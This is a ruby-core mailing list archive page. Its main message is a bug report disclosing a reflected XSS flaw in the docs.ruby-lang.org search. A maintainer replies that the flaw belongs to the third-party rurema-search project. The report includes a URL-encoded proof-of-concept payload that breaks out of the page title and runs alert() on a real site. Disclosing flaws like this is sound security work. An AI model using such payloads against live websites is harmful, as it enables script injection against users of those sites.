[#84867] [Ruby trunk Bug#14357] thread_safe tests suite segfaults — v.ondruch@...

Issue #14357 has been reported by vo.x (Vit Ondruch).

11 messages 2018/01/15
[#85364] Re: [Ruby trunk Bug#14357] thread_safe tests suite segfaults — Eric Wong <normalperson@...> 2018/02/03

v.ondruch@tiscali.cz wrote:

[#84980] [Ruby trunk Feature#13618][Assigned] [PATCH] auto fiber schedule for rb_wait_for_single_fd and rb_waitpid — hsbt@...

Issue #13618 has been updated by hsbt (Hiroshi SHIBATA).

10 messages 2018/01/23
[#85012] Re: [Ruby trunk Feature#13618][Assigned] [PATCH] auto fiber schedule for rb_wait_for_single_fd and rb_waitpid — Eric Wong <normalperson@...> 2018/01/23

hsbt@ruby-lang.org wrote:

[ruby-core:85110] [Ruby trunk Bug#14389] Reflected XSS

From: hamitcibo4@...
Date: 2018-01-25 11:12:10 UTC
List: ruby-core #85110
Issue #14389 has been updated by TheGirdap (Hamit Cibo).


hsbt (Hiroshi SHIBATA) wrote:
> Thank you for your report.
> 
> But I know that you already reported other places and shared the upstream information.
> 
>  * https://github.com/ruby/www.ruby-lang.org/issues/1734
>  * https://github.com/ruby/www.ruby-lang.org/issues/1735
>  * https://github.com/clear-code/rurema-search/issues/27
>  * security at ruby-lang.org
>  * hackerone
> 
> It's the issue of [rurema-search](https://github.com/clear-code/rurema-search) that is documentation searcher, NOT the ruby language.

gift ?

----------------------------------------
Bug #14389: Reflected XSS 
https://bugs.ruby-lang.org/issues/14389#change-69823

* Author: TheGirdap (Hamit Cibo)
* Status: Third Party's Issue
* Priority: Normal
* Assignee: 
* Target version: 
* ruby -v: 
* Backport: 2.3: UNKNOWN, 2.4: UNKNOWN, 2.5: UNKNOWN
----------------------------------------
Hello,

Reflected Xss found ..

https://docs.ruby-lang.org/ja/search/query:import/query:callback/%22%3E%3C/title%3Ealert(XSS%20A%C3%A7%C4%B1%C4%9F%C4%B1)%3C/script%3E%3E%3Cmarquee%3E%3Ch1%3EXSSa%C3%A7%C4%B1%C4%9F%C4%B1%3C/h1%3E%3C/marquee%3E%3D

result ;

ss:

search:

search box > ....import+words+payload => reflected xss

https://twitter.com/hamit_cibo

---Files--------------------------------
Ekran_Resmi_2018-01-24_01.09.36 (1).png (187 KB)


-- 
https://bugs.ruby-lang.org/

Unsubscribe: <mailto:ruby-core-request@ruby-lang.org?subject=unsubscribe>
<http://lists.ruby-lang.org/cgi-bin/mailman/options/ruby-core>

In This Thread

Prev Next